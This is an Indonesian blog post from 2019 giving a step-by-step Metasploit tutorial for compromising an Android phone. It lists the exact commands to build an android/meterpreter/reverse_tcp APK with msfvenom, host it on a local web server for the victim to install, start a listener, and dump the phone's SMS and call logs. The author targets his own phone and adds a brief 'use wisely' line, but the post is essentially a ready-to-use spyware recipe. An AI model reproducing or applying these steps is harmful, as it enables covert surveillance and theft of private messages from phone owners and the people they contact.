Monday, 7 January 2019

Metasploit Framework Trick (Hack & Sadap Smartphone )



Assalamualaikum Wr. Wb

Hehehe sekali-kali lah posting yang ginian,

Okrek bro jadi kali ini kita akan belajar exploit smartphone. Pada postingan ini,saya menggunakan Hp Vivo Y53 milik saya sebagai targetnya . kali ini saya menggunakan OS Parrot V4.4

Yokk langsung aja,

Sebelumya,aktifkan dulu postgresql dengan perintah

service postgresql start

Buat payload terlebih dahulu menggunakan perintah

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.3 LPORT=4444 -o /var/www/html/a.apk

Keterangan :

10.10.10.3  = IP Interface Wireless saya
4444           = Port yang saya gunakan. Bisa diatur sesuai selera
a.apk          = Output dari payload yang berupa file .apk yang berada di /var/www/html untuk disebarkan melalui web server

Setelah itu aktifkan apache2 dengan perintah

service apache2 start

. Dari Hp target. Download file dengan membuka IP address laptop/a.apk
Misal 10.10.10.3/a.apk maka file tersebut akan terdownload ke Hp. Install seperti biasa


Aktifkan Metasploit Framework Console dengan perintah

msfconsole


Setting Console :

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 10.10.10.3 (IP Interface Wireless saya)
set lport 4444 (port yang sudah saya tentukan sebelumnya)


Ketikkan perintah exploit kemudian tekan enter sambil membuka aplikasi yang sudah di install di HP target. Maka akan membuka koneksi ke HP tersebut


Ketikkan help untuk melihat opsi apa saja yang bisa dilakukan


dump_sms untuk mengambil list pesan pada HP dari siapa saja pesan tersebut dikirim/diterima . Nanti ke save di direktori /home


Ini hasil dari dumping SMS dan Panggilan



Mantap broo.. Semoga bisa jadi hiburan di sela waktu luang,ingat gunakan tools dengan bijak ya

Sekian dari saya

Wassalamualaikum Wr. Wb
Disqus Comments